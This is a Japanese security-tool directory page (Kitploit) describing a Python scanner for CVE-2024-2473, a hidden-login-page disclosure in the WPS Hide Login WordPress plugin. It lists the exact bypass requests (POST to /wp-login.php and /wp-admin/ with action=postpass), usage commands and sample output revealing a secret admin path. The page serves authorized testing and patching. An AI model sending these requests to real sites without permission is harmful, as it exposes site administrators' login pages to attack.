Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-2473 — WordPress 隠しログインページの開示。WPS Hide Login ≤ 1.9.15.2 を実行している WordPress サイトでログインページの開示を検出します (CVE-2024-2473) | Kitploit
ツール/GitHubGitHub/m4xsec/cve-2024-2473
偵察脆弱性スキャナーエクスプロイト情報収集ウェブセキュリティペネトレーションテスト
GitHubm4xsec/cve-2024-2473

CVE-2024-2473

WordPress 隠しログインページの開示。WPS Hide Login ≤ 1.9.15.2 を実行している WordPress サイトでログインページの開示を検出します (CVE-2024-2473)

リポジトリを見る
215ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-2473 — WPS Hide Login ログインページ識別ツール

WPS Hide Login ≤ 1.9.15.2 を実行しているWordPressサイトでログインページの漏洩を検出するプロフェッショナルなPythonスキャナー

Python CVE CVSS License Platform

コード作成者:Venexy


目次

  • 概要
  • 脆弱性の詳細
  • 動作の仕組み
  • 必要条件
  • インストール
  • 使用方法
  • 出力例
  • 免責事項
  • 参考文献

概要

WPS Hide Login は、管理者がデフォルトの /wp-login.php URL をカスタムの隠しパスに変更できる人気のWordPressプラグインです。これは難読化によるセキュリティとして機能します。

このスキャナーは CVE-2024-2473 を検出します。これは、action=postpass パラメータを指定することでプラグインの保護メカニズムを完全にバイパスし、認証されていない攻撃者に隠しログインページのURLを露呈させる脆弱性です。


脆弱性の詳細

説明

WPS Hide Login プラグインは、WordPressのログインページをデフォルトの /wp-login.php から管理者が選択したカスタムURLに移行します。しかし、1.9.15.2 までの全バージョンにおいて、/wp-login.php または /wp-admin/ に action=postpass クエリパラメータを指定することでこの保護がバイパスされ、隠しログインフォームの実際のアクションURLが明らかになります。これにより、認証されていない攻撃者に秘密のログインパスが露呈します。


動作の仕組み

スキャナーは脆弱性の攻撃フローを3つのフェーズで再現します。

root@kitploit:~
Phase 1  ─►  Confirm target is a WordPress installation
                  │
                  ▼
Phase 2a ─►  POST /wp-login.php?action=postpass
             with body: action=lostpassword&post_password=test
             Check: HTTP 200 + lostpasswordform present + no wp-login.php in body
             Extract hidden login URL from form action attribute
                  │
Phase 2b ─►  POST /wp-admin/?action=postpass
             Check: HTTP 302 redirect to location containing reauth=1 or /login
                  │
                  ▼
             Report hidden login URL if discovered

フェーズ2aまたはフェーズ2b のいずれかが一致した場合、ターゲットは 脆弱 と判定されます。


必要条件

  • Python 3.7 以上
  • requests ライブラリ

インストール

1. リポジトリをクローン

root@kitploit:~
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473

2. 依存関係をインストール

root@kitploit:~
pip install requests

注: Python仮想環境やKali Linuxを使用している場合は、以下のコマンドが必要になる場合があります。

root@kitploit:~
pip install requests --break-system-packages

使用方法

root@kitploit:~
python CVE-2024-2473.py -u <TARGET_URL> [-t TIMEOUT]

引数

引数説明デフォルト
-u, --urlターゲットWordPressのベースURL(必須)—
-t, --timeoutHTTPリクエストのタイムアウト(秒)

例

root@kitploit:~
# 基本スキャン
python CVE-2024-2473.py -u https://example.com

# カスタムタイムアウトでスキャン
python CVE-2024-2473.py -u https://example.com --timeout 15

# HTTPでスキャン
python CVE-2024-2473.py -u http://192.168.1.100

出力例

root@kitploit:~
 ...

  ┌─────────────────────────────────────────────────────────────┐
  │  CVE-2024-2473  •  WPS Hide Login Page Identifier           │
  │  Coded by Venexy | https://github.com/m4xsec               │
  └─────────────────────────────────────────────────────────────┘

  ===============================================================
    TARGET    https://example.com
    TIME      2024-11-01 18:00:00
    TIMEOUT   10s
  ===============================================================

  [18:00:00] [*] Phase 1 | Fingerprinting WordPress installation ...
  [18:00:01] [+] WordPress confirmed — https://example.com

  [18:00:01] [*] Phase 2 | Testing CVE-2024-2473 bypass vectors ...

  [18:00:01] [*] Vector A | POST /wp-login.php?action=postpass
             +- Status : 200   Result : MATCH

  [18:00:02] [*] Vector B | POST /wp-admin/?action=postpass
             +- Status : 302   Result : MATCH

  ###############################################################
  ##           VULNERABILITY CONFIRMED  --  CVE-2024-2473      ##
  ###############################################################

    Plugin          WPS Hide Login <= 1.9.15.2
    Severity        Medium (CVSS 5.3 / EPSS 93rd percentile)
    CWE             CWE-200 — Exposure of Sensitive Information
    CVSS Vector     AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N

  [18:00:02] [VULN] Bypass confirmed via /wp-login.php?action=postpass

  ====================================================
        HIDDEN LOGIN URL DISCOVERED
  ====================================================

  >>  https://example.com/my-secret-admin-path/

  ====================================================

免責事項

このツールは、許可されたセキュリティテストおよび教育目的のみを対象としています。

作成者は、このツールの誤用またはそれによって生じた損害について一切の責任を負いません。セキュリティ評価を行う前に、必ずターゲットシステムの所有者から明示的な書面による許可を得てください。無許可のスキャンやシステムの悪用は違法であり、非倫理的です。

責任を持って使用してください。


参考文献


Venexy が ❤️ を込めて作成 (https://github.com/m4xsec)

このツールが役に立ったなら、リポジトリに ⭐🌟🌟🌟 を付けることを検討してください。

ツールをダウンロード
フィールド詳細
CVE IDCVE-2024-2473
影響を受けるバージョンWordPress用 WPS Hide Login プラグイン ≤ 1.9.15.2
重要度中
CVSSスコア5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
CWECWE-200 — 機密情報の露出
EPSSスコア0.10433 (93パーセンタイル)
認証の必要性なし
ベンダーWPServeur
対策プラグインをバージョン > 1.9.15.2 に更新
10
リソースリンク
NVD — CVE-2024-2473https://nvd.nist.gov/vuln/detail/CVE-2024-2473
Wordfence セキュリティ勧告https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure
WPS Hide Login プラグインhttps://wordpress.org/plugins/wps-hide-login/
CWE-200https://cwe.mitre.org/data/definitions/200.html
CVSS 3.1 計算ツールhttps://www.first.org/cvss/calculator/3.1